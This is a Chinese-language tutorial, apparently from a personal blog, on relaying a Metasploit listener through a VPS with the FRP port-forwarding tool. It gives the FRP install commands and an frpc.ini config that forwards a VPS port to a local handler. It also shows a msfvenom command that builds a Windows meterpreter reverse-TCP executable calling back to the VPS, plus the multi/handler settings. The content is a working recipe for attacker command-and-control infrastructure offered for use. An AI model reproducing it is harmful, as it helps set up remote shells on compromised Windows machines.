- 前言:
本来一开始是在Vps上直接安装的MSF,想安装的可以试试,附一键脚本:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall && ./msfinstall
可以用,但是总是时不时崩溃(可能是配置太低),烦的一pi.
然后就去Google找到了ngrok的端口转发教程。试了下,可以用,不过用起来反应很慢,时不时还掉线,尼玛啊,最坑的是有的平台(VIP是不可能开的,这辈子都不可能)不能固定外网端口,启动一次客户端就换一个端口,每次都要改Payload,费劲。
然后试了下用Frp来转发,相比起来简直不要太爽。
1. 准备工作:
VPS一台
FRP ##下载地址:https://github.com/fatedier/frp/releases(根据自己的VPS选择对应的版本)
2.安装步骤:
在VPS上执行(我的是Centos x64):
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz ##下载frp
tar -zxvf frp_0.16.1_linux_amd64.tar.gz ##解压
cd frp_0.16.1_linux_amd64
rm frpc&&rm frpc.ini ##这个是客户端文件,用不上,删不删随意。
./frps -c frps.ini ##默认配置文件启动服务端。
在自己电脑执行(我的是KALi x64):
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz ##下载frp
tar -zxvf frp_0.16.1_linux_amd64.tar.gz ##解压
cd frp_0.16.1_linux_amd64
rm frps&&rm frps.ini ##这个是服务端文件,用不上,删不删随意。
./frpc -c frpc.ini ##使用配置文件启动客户端。
注意frpc.ini配置文件内容(详细参考):
[common]
server_addr = *.*.*.* ##VPS的IP地址
server_port = 7000
[msf]
type = tcp ##协议
local_ip = *.*.*.* ##本地内网主机IP。
local_port = 4444 ##本地MSF监听的端口
remote_port = 8011 ##Payload设置的LPORT端口,LHOST为VPS的IP。
Payload生成实例:
$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=VPS的IP lport=8011 -f exe -o payload.exe
MSf监听示例:
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.16.1.254 yes The listen address
LPORT 4444 yes The listen port
附一张截图:
结束语:
当然frp不止tcp端口转发这一种用法,还可以做socks5,http代理等,其他的自行查看说明文档。